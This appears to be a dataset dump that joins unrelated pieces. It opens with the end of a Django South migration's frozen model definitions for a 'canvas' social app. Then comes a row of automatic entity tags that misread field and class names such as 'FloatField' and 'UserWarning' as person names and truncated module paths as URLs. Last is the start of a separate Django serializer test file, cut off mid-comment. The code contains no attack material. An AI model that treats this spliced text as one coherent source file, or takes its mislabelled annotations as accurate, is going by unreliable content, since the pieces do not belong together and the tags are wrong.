'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'canvas.apiapp': {
'Meta': {'object_name': 'APIApp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'canvas.apiauthtoken': {
'Meta': {'unique_together': "(('user', 'app'),)", 'object_name': 'APIAuthToken'},
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.APIApp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.bestof': {
'Meta': {'object_name': 'BestOf'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'best_of'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'best_of'", 'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {})
},
'canvas.category': {
'Meta': {'object_name': 'Category'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}),
'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.comment': {
'Meta': {'object_name': 'Comment'},
'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'127.0.0.1'", 'max_length': '15'}),
'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}),
'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}),
'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'star_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.commentflag': {
'Meta': {'object_name': 'CommentFlag'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['auth.User']"})
},
'canvas.commentmoderationlog': {
'Meta': {'object_name': 'CommentModerationLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderated_comments_log'", 'to': "orm['auth.User']"}),
'visibility': ('django.db.models.fields.IntegerField', [], {})
},
'canvas.commentpin': {
'Meta': {'object_name': 'CommentPin'},
'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.commentsticker': {
'Meta': {'object_name': 'CommentSticker'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stickers'", 'to': "orm['canvas.Comment']"}),
'epic_message': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '140', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'canvas.commentstickerlog': {
'Meta': {'object_name': 'CommentStickerLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.content': {
'Meta': {'object_name': 'Content'},
'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'127.0.0.1'", 'max_length': '15'}),
'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'remixes'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'remix_text': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}),
'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'used_as_stamp'", 'blank': 'True', 'to': "orm['canvas.Content']"}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.ContentUrlMapping']", 'null': 'True', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.contenturlmapping': {
'Meta': {'object_name': 'ContentUrlMapping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.emailunsubscribe': {
'Meta': {'object_name': 'EmailUnsubscribe'},
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.externalcontent': {
'Meta': {'object_name': 'ExternalContent'},
'_data': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'external_content'", 'to': "orm['canvas.Comment']"}),
'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'null': 'True', 'blank': 'True'})
},
'canvas.facebookinvite': {
'Meta': {'object_name': 'FacebookInvite'},
'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"})
},
'canvas.facebookuser': {
'Meta': {'object_name': 'FacebookUser'},
'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'canvas.followcategory': {
'Meta': {'unique_together': "(('user', 'category'),)", 'object_name': 'FollowCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'followers'", 'to': "orm['canvas.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'following'", 'to': "orm['auth.User']"})
},
'canvas.invitecode': {
'Meta': {'object_name': 'InviteCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"})
},
'canvas.remixplugin': {
'Meta': {'object_name': 'RemixPlugin'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.stashcontent': {
'Meta': {'object_name': 'StashContent'},
'content': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.userinfo': {
'Meta': {'object_name': 'UserInfo'},
'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']", 'null': 'True'}),
'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'follower_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invite_bypass': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']", 'null': 'True'}),
'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}),
'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'canvas.usermoderationlog': {
'Meta': {'object_name': 'UserModerationLog'},
'action': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderation_log'", 'to': "orm['auth.User']"})
},
'canvas.userwarning': {
'Meta': {'object_name': 'UserWarning'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'custom_message': ('django.db.models.fields.TextField', [], {}),
'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('canvas.util.UnixTimestampField', [], {}),
'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_warnings'", 'to': "orm['auth.User']"}),
'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.welcomeemailrecipient': {
'Meta': {'object_name': 'WelcomeEmailRecipient'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['canvas']
| 21,701 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'FloatField'], ['DATE_TIME', "'2000'"], ['PERSON', 'FloatField'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['PERSON', 'RemixPlugin'], ['DATE_TIME', "'2000'"], ['PERSON', 'follower_count'], ['PERSON', 'UserWarning'], ['PERSON', 'complete_apps'], ['URL', 'auth.gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'auth.pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'contenttypes.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'auth.us'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.be'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'canvas.ca'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Bo'], ['URL', 
'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.fo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.in'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.re'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'canvas.st'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 
'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Nu'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'contenttypes.co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch']] |
42 | """
A test spanning all the capabilities of all the serializers.
This class defines sample data and a dynamically generated
test case that is capable of testing the capabilities of
the serializers. This includes all valid data values, plus
forward, backwards and self references.
"""
from __future__ import unicode_literals
import datetime
import decimal
from unittest import expectedFailure, skipUnless
try:
import yaml
except ImportError:
yaml = None
from django.core import serializers
from django.core.serializers import SerializerDoesNotExist
from django.core.serializers.base import DeserializationError
from django.core.serializers.xml_serializer import DTDForbidden
from django.db import connection, models
from django.http import HttpResponse
from django.test import TestCase
from django.utils import six
from django.utils.encoding import force_text
from django.utils.functional import curry
from .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData,
FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData,
GenericIPAddressData, NullBooleanData, PositiveIntegerData,
PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData,
GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData,
FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData,
Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData,
DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData,
GenericIPAddressPKData, PositiveIntegerPKData,
PositiveSmallIntegerPKData, SlugPKData, SmallPKData,
AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel,
ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel,
ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel,
NaturalKeyAnchor, FKDataNaturalKey)
# A set of functions that can be used to recreate
# test data objects of various kinds.
# The save method is a raw base model save, to make
# sure that the data in the database matches the
# exact test case.
def data_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def generic_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data[0]
models.Model.save_base(instance, raw=True)
for tag in data[1:]:
instance.tags.create(data=tag)
return [instance]
def fk_create(pk, klass, data):
instance = klass(id=pk)
setattr(instance, 'data_id', data)
models.Model.save_base(instance, raw=True)
return [instance]
def m2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
instance.data = data
return [instance]
def im2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
return [instance]
def im_create(pk, klass, data):
instance = klass(id=pk)
instance.right_id = data['right']
instance.left_id = data['left']
if 'extra' in data:
instance.extra = data['extra']
models.Model.save_base(instance, raw=True)
return [instance]
def o2o_create(pk, klass, data):
instance = klass()
instance.data_id = data
models.Model.save_base(instance, raw=True)
return [instance]
def pk_create(pk, klass, data):
instance = klass()
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def inherited_create(pk, klass, data):
instance = klass(id=pk,**data)
# This isn't a raw save because:
# 1) we're testing inheritance, not field behavior, so none
# of the field values need to be protected.
# 2) saving the child class and having the parent created
# automatically is easier than manually creating both.
models.Model.save(instance)
created = [instance]
    for klass, field in instance._meta.parents.items():
created.append(klass.objects.get(id=pk))
return created
# A set of functions that can be used to compare
# test data objects of various kinds
def data_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
if klass == BinaryData and data is not None:
testcase.assertEqual(bytes(data), bytes(instance.data),
"Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)" % (
pk, repr(bytes(data)), type(data), repr(bytes(instance.data)),
type(instance.data))
)
else:
testcase.assertEqual(data, instance.data,
"Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)" % (
pk, data, type(data), instance, type(instance.data))
)
def generic_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data[0], instance.data)
testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')])
def fk_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, instance.data_id)
def m2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')])
def im2m_compare(testcase, pk, klass, data):
    klass.objects.get(id=pk)
    # Nothing else to check; .get() raises DoesNotExist if the instance is missing.
def im_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data['left'], instance.left_id)
testcase.assertEqual(data['right'], instance.right_id)
if 'extra' in data:
testcase.assertEqual(data['extra'], instance.extra)
else:
testcase.assertEqual("doesn't matter", instance.extra)
def o2o_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data_id)
def pk_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data)
def inherited_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
for key,value in data.items():
testcase.assertEqual(value, getattr(instance,key))
# Define some data types. Each data type is
# actually a pair of functions; one to create
# and one to compare objects of that type
data_obj = (data_create, data_compare)
generic_obj = (generic_create, generic_compare)
fk_obj = (fk_create, fk_compare)
m2m_obj = (m2m_create, m2m_compare)
im2m_obj = (im2m_create, im2m_compare)
im_obj = (im_create, im_compare)
o2o_obj = (o2o_create, o2o_compare)
pk_obj = (pk_create, pk_compare)
inherited_obj = (inherited_create, inherited_compare)
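# Worked example of how one test_data row below is consumed (a sketch of the
# flow in serializerTest, not executed here): for the row
# (data_obj, 10, CharData, "Test Char Data"), the test first calls
# data_create(10, CharData, "Test Char Data") to build the object, and after a
# serialize/deserialize round trip calls
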